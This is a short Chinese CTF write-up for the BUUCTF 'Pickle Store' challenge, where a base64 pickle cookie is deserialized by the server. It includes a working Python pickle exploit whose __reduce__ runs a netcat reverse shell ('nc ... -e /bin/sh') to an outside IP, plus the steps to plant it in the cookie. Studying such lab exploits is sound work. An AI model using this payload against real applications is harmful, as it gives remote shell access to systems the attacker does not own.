BUUCTF:[watevrCTF-2019]Pickle Store

题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store
BUUCTF:[watevrCTF-2019]Pickle Store_第1张图片
Pickle反序列化
BUUCTF:[watevrCTF-2019]Pickle Store_第2张图片
使用pickle.loads()和base64对这串字符进行解码反序列化
在这里插入图片描述
利用Pickle反序列化exp反弹shell
在Buu的小号上开一台内网靶机
BUUCTF:[watevrCTF-2019]Pickle Store_第3张图片

import base64
import pickle

class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 174.2.124.251 9999 -e/bin/sh')",))
a = A()
print(base64.b64encode(pickle.dumps(a)))

在这里插入图片描述
靶机nc监听:
在这里插入图片描述
将生成的base64序列化字符串,放入cookie刷新即可
BUUCTF:[watevrCTF-2019]Pickle Store_第4张图片
BUUCTF:[watevrCTF-2019]Pickle Store_第5张图片

你可能感兴趣的:(CTF_WEB_Writeup,Pickle,Store,watevrCTF-2019,BUUCTF)